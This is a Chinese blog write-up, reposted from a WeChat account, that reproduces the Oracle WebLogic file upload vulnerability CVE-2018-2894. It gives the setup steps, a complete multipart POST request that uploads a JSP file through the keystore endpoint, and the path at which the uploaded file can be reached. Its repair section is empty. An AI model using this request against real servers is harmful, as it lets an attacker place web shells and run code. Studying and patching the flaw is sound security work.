0X01 简介
Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
Oracle WebLogic Server 12.2.1.3
复现环境:
需开启启动WEB服务测试页,base_domain>高级>启动Web服务测试页
http://192.168.245.134:7001/ws_utc/config.do
替换路径 C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domainserversAdminServertmp_WL_internalcom.oracle.webservices.wls.ws-testclient-app-wls4mcj4ywarcss
框内随意输入,点击上传文件
POST /ws_utc/resources/setting/keystore?timestamp=1697101773836 HTTP/1.1
Host: 192.168.245.134:7001
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156455767620224251851092871124
Content-Length: 862
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_name"
123
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_edit_mode"
false
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_password_front"
123
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_password"
123
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_password_changed"
true
-----------------------------156455767620224251851092871124
Content-Disposition: form-data; name="ks_filename"; filename="1.jsp"
Content-Type: text/xml
<% out.print("test"); %>
-----------------------------156455767620224251851092871124--
http://192.168.245.134:7001/ws_utc/css/config/keystore/1697101791966_1.jsp
前面是ID值,后面是文件名
0X03 修复建议
0X04 写在最后
漏洞在开发模式下复现成功,生产模式访问为503,不清楚是不是环境原因。
回复“加群”,获取群号。
侵删!
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Weblogic 文件上传漏洞(CVE-2018-2894)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论